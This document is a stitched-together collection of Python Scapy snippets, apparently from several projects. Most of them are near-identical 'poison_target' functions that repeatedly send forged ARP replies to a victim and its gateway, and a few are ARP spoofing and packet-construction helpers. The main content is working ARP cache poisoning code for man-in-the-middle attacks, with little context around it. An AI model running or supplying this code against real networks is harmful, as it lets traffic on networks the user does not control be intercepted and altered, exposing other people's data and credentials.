def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
global poisoning
global result
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while poisoning:
scapy.all.send(poison_target)
scapy.all.send(poison_gateway)
scapy.all.time.sleep(2)
result += ",[*] ARP poison attack finished."
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print '[*] Beginning the ARP poison. [CTRL_C to stop]'
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print '[*] ARP poison attack finished'
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "[*] APR poison attack finished."
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
global poisoning
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the ARP poison. [CTRL-C] to stop]")
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print("[*] ARP poison attack finished")
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
#Send ARP request using scapy
poison_target = ARP()
poison_target.op = 2 #is for is_at
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2 #is for is_at
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "STARTING ARP POISONING"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "ARP POISONING ENDED"
return
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] Beginning the poisoning. Press [CTRL-C] to stop]")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print("[*] ARP Poisoning finished.")
return
def sendARP(args):
a = ARP()
a.pdst = args.dip
a.psrc = args.sip
a.hwsrc = args.smac
a.op = 'who-has '
try:
while 1:
send(a, 1)
time.sleep(5)
except KeyboardInterrupt:
pass
def arpPoisoning(src_mac, src_ip, tgt_ip, tgt_mac):
"""
Not used ... 1st poison the network into thinking you are the victim as well as the reflector
"""
#Here Ethernet layer will need to be changed too
arp = ARP()
arp.hwsrc = src_mac
arp.psrc = src_ip
arp.hwdst = tgt_mac
arp.pdst = tgt_ip
arp.op = ARP.who_has
#sendp(arp, iface=INTERFACE)
send(arp, iface=INTERFACE)
def spoof_packets(self):
print("[*] Spoofing packets...")
gateway_packet = ARP()
gateway_packet.op = 2
gateway_packet.psrc = self.gateway_ip
gateway_packet.hwsrc = self.gateway_mac
gateway_packet.pdst = self.target_ip
gateway_packet.hwdst = self.target_mac
print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
self.gateway_ip, self.target_ip))
target_packet = ARP()
target_packet.op = 2
target_packet.psrc = self.target_ip
target_packet.hwsrc = self.target_mac
target_packet.pdst = self.gateway_ip
target_packet.hwdst = self.gateway_mac
print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
self.target_ip, self.gateway_ip))
return gateway_packet, target_packet
async def recv(self):
rx_frame = await self.sink.recv()
eth = Ether()
eth.dst = rx_frame.eth_dest_mac.integer.to_bytes(6, 'big')
eth.src = rx_frame.eth_src_mac.integer.to_bytes(6, 'big')
eth.type = rx_frame.eth_type.integer
arp = ARP()
arp.hwtype = rx_frame.arp_htype.integer
arp.ptype = rx_frame.arp_ptype.integer
arp.hwlen = rx_frame.arp_hlen.integer
arp.plen = rx_frame.arp_plen.integer
arp.op = rx_frame.arp_oper.integer
arp.hwsrc = rx_frame.arp_sha.integer.to_bytes(6, 'big')
arp.psrc = rx_frame.arp_spa.integer
arp.hwdst = rx_frame.arp_tha.integer.to_bytes(6, 'big')
arp.pdst = rx_frame.arp_tpa.integer
rx_pkt = eth / arp
return Ether(bytes(rx_pkt))
def getARPPacket(self):
"""
构造ARP数据包
:return:
"""
try:
arp_packet = ARP()
arp_packet.hwtype = int(self.entries[0].get())
arp_packet.ptype = int(self.entries[1].get())
arp_packet.op = int(self.entries[2].get())
arp_packet.hwlen = int(self.entries[3].get())
arp_packet.plen = int(self.entries[4].get())
arp_packet.hwdst = self.entries[5].get()
arp_packet.psrc = self.entries[6].get()
arp_packet.hwsrc = self.entries[7].get()
arp_packet.pdst = self.entries[8].get()
arp_packet.show()
self.resultText.insert('end', arp_packet.summary() + '\n')
self.resultText.insert('end', str(arp_packet) + '\n')
return Ether() / arp_packet
except Exception as e:
print(e.with_traceback())
finally:
pass